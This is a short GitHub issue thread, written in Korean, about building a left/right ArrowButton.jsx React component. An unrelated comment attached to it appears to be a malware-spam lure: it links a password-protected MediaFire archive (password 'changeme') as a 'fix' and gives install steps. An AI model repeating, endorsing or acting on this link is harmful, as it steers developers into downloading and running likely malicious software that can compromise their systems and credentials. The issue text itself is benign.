### ISSUE TITLE
ArrowButton.jsx 컴포넌트 제작

### ISSUE THREAD

**Issue by JaeGuipi** [FE-J5/fandom-k#10]
## 🚀 Description
ArrowButton.jsx 컴포넌트 제작하기

오른쪽, 왼쪽 둘다 있기 때문에 defalut 사용하지 않음.

## ✅ TODO
- [x] ArrowButton.jsx 컴포넌트 제작하기

**Comment by pyrosensei** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
